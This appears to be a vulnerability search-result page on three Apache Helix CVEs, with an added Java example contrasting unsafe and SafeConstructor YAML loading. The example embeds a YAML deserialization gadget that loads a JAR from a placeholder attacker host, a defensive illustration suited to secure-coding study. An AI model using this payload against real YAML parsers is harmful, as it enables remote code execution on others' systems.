3 matches found
CVE-2023-38647
CVE-2023-38647 describes a deserialization vulnerability in the Apache Helix workflow and REST components. SnakeYAML is used to parse untrusted YAML, so a document can instantiate java.net.URLClassLoader to load a JAR from an attacker-chosen URL and then construct javax.script.ScriptEngineManager with that ClassLoader to execute code. This unbounded deserialization can likely l...
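The pattern behind this entry, as an added example that is not Helix's own code: the vulnerable call is a plain `new Yaml().load(...)` on untrusted input, which honours global (`!!`) tags and instantiates whatever class they name; the hardened call uses `SafeConstructor`, which only builds standard YAML types and rejects the tag chain the entry describes. The YAML strings are constructed here, the JAR URL is a placeholder, and the code assumes SnakeYAML 1.x (where `SafeConstructor` has a no-arg constructor; 2.x requires `new SafeConstructor(new LoaderOptions())` and its default `Yaml()` already refuses global tags).

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class HelixYamlLoading {

    // Constructed sample with the tag shape the entry describes:
    // ScriptEngineManager built from a URLClassLoader that points at a JAR URL.
    // The host is a placeholder (.invalid TLD), not a real server.
    static final String GADGET_YAML =
        "!!javax.script.ScriptEngineManager [\n" +
        "  !!java.net.URLClassLoader [[\n" +
        "    !!java.net.URL [\"http://attacker.invalid/evil.jar\"]\n" +
        "  ]]\n" +
        "]\n";

    // Constructed sample of the kind of plain data a workflow definition carries.
    static final String WORKFLOW_YAML =
        "name: myWorkflow\n" +
        "tasks:\n" +
        "  - id: t1\n" +
        "    command: Reindex\n";

    // Vulnerable pattern: the default constructor resolves !! tags to classes on
    // the classpath and calls their constructors while parsing.
    static Object loadUnsafe(String yaml) {
        return new Yaml().load(yaml);
    }

    // Hardened pattern: SafeConstructor knows only the standard YAML types
    // (maps, lists, scalars) and throws on any other tag.
    static Object loadSafe(String yaml) {
        return new Yaml(new SafeConstructor()).load(yaml);
    }

    public static void main(String[] args) {
        // Ordinary data still loads as Map/List/String.
        System.out.println(loadSafe(WORKFLOW_YAML));

        // The gadget document is refused before any class is instantiated.
        try {
            loadSafe(GADGET_YAML);
            System.out.println("unexpected: gadget document was accepted");
        } catch (YAMLException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // loadUnsafe(GADGET_YAML) is deliberately not called: with a reachable
        // JAR URL it would fetch and execute attacker code.
    }
}
```

When auditing a codebase for this class of bug, grep for `new Yaml(` and treat every instance without a `SafeConstructor` (or, on 2.x, without a restrictive `LoaderOptions`) that reaches untrusted input as a finding; the class name inside the tag is attacker-controlled, so allow-listing specific tags is the only safe alternative to `SafeConstructor`.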
CVE-2022-47500
CVE-2022-47500 affects the Apache Helix UI component. The issue is an Open Redirect caused by an improperly designed forward component used for UI embedding, impacting all Apache Helix UI releases from 0.8.0 through 1.0.4. The documented remediation is to upgrade to version 1.1.0, which addresses...
CVE-2024-22281
The CVE-2024-22281 entry concerns Apache Helix Front (UI). The vulnerability is caused by a hard-coded secret in the express-session usage, enabling session spoofing via forged cookies across all versions of the Front UI. Public details state that the project is retired and no fix will be release...